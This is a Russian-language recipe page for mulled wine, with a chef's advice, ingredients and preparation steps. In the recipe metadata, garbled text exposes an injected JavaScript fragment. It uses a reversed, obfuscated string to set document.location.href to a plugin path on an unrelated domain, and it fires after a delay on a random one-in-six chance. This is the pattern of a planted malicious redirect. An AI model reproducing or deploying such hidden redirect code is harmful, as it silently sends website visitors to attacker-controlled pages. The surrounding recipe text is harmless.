Рецепт дня: согревающий глинтвейн

Ефим Дьяченко, повар кулинарной мастерской Just Cook, рассказывает, как приготовить прекрасный зимний напиток.

— Для классического глинтвейна лучше всего использовать именно красное вино. Белые и розовые вина слишком уксусные, они сделают напиток очень кислым. Ну и сладкое вино тоже не советую использовать — тогда глинтвейн получится очень сладким.

 

При приготовлении глинтвейна главное его не варить. Лучше вообще его не доводить до кипения, иначе выпарится весь алкоголь. Если хотите, чтобы напиток получился насыщенный и пряный, смешайте ингредиенты и дайте глинтвейну настояться полчаса — в вине смешаются ароматы фруктов и специй и получится что-то невероятное.

 

В любом рецепте глинтвейна обязательно должны быть специи — корица, гвоздика. Остальное добавляете по вкусу. В своём, например, я использую даже изюм — он придаёт напитку необычный аромат и вкус. Если вы не пьёте алкоголь, замените вино соком. Вишнёвый, виноградный, гранатовый, яблочный, сливовый — подойдёт любой, главное — берите тот, в котором меньше всего сахара.

Согревающий глинтвейн

Рецепт дня: согревающий глинтвейн. Изображение номер 1

Фото: elle.de

Рецепт дня: согревающий глинтвейн

СЛОЖНОСТЬ РЕЦЕПТА:

ВРЕМЯ ПРИГОТОВЛЕНИЯ:

1 ЧАС

КОЛИЧЕСТВО ПОРЦИЙ:

4

КАЛОРИЙНОСТЬ:

не указана

0 calories

Рецпет с сайта fitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nyashka.ru

PT1H

PT1H

Ингредиенты

Красное сухое вино

750 мл

корица

2 палочки

гвоздика

4 шт.

корень имбиря

кусочек размером 2 см

апельсины

4-5 шт.

изюм без косточек

2 ст. л.

сахар

1 ст. л.

яблоко

4 дольки

душистый перец горошком

1 шт.

стручки кардамона

3 шт.

  1. Вымойте апельсины. Снимите с них цедру и выжмите сок. Нарежьте корень имбиря. Промойте изюм.
  2. Влейте в сотейник стакан воды, разведите в ней сахар. Добавьте туда специи (корицу, гвоздику, имбирь, перец и кардамон), цедру и изюм и поставьте на огонь. Варите около пяти минут.
  3. Влейте в сотейник апельсиновый фреш, вино, добавьте яблоки и держите смесь на огне до тех пор, пока глинтвейн не станет горячим (от него пойдёт пар).
  4. Снимите с огня, накройте крышкой и оставьте настаиваться полчаса.
  5. Перед подачей подогрейте глинтвейн и процедите.
Оцените статью
Дежурная Качалка
Добавить комментарии

;-) :| :x :twisted: :smile: :shock: :sad: :roll: :razz: :oops: :o :mrgreen: :lol: :idea: :grin: :evil: :cry: :cool: :arrow: :???: :?: :!:

Adblock
detector